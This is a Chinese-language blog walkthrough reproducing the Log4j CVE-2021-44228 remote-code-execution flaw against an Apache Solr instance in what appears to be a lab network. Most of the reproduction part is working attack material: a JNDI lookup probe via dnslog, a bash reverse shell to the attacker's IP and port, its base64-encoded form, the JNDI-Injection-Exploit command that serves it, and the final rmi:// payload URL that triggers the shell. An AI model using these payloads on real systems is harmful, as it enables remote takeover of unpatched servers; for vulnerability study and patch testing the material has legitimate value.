log4j CVE-2021-44228 RCE漏洞复现

一、漏洞特征

Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。

影响版本:Apache Log4j 2.x <= 2.14.1

访问http://192.168.232.131:8983/即可查看到Apache Solr的后台页面

访问

http://192.168.232.131:8983/solr/admin/cores?action=${jndi:ldap://ugvqt3.dnslog.cn}

dnslog可以收到相关日志

二、漏洞复现

1.准备payload

bash -i >& /dev/tcp/192.168.245.2/6969 0>&1

192.168.245.2是攻击机ip

base加密:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==

2.开启监听

3.获取jndi payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.245.2

这里echo后面就是你加密之后的值,最后面的IP还是攻击机的IP,回车启动

启动后提取第一个payload:rmi://192.168.245.2:1099/sfvz6q

4.反弹shell

http://192.168.232.131:8983/solr/admin/cores?action=${jndi:rmi://192.168.245.2:1099/sfvz6q}

相关推荐
星释1 天前
鸿蒙智能体开发实战:27.Skill 测试、发布与管理
ui·华为·log4j·harmonyos·鸿蒙·智能体
充钱大佬1 天前
Python测试基础教程
python·log4j·apache
xiaoshuaishuai82 天前
C# AI实现PR处理、单元测试
开发语言·c#·log4j
醉熏的斑马3 天前
ASP.Net MVC3 】使用Moq让单元测试变得更简单
单元测试·log4j·asp.net
cfm_29146 天前
SpringBoot MockMvc
spring boot·后端·log4j
天真的银耳汤7 天前
01 静态分析(Static Analysis)
log4j
周杰伦fans1 个月前
记一次 Visual Studio 突然报错“未能加载 Microsoft.Internal.VisualStudio.Interop”的奇葩经历
microsoft·log4j·visual studio
laplaya1 个月前
C++大型项目组件通信与依赖管理实践
c++·log4j·apache
福大大架构师每日一题1 个月前
ollama v0.30.7 正式发布:Hermes 桌面端落地,接口、文档、底层依赖全方位优化
golang·log4j
四问四不知1 个月前
Understand Anything的初步了解
log4j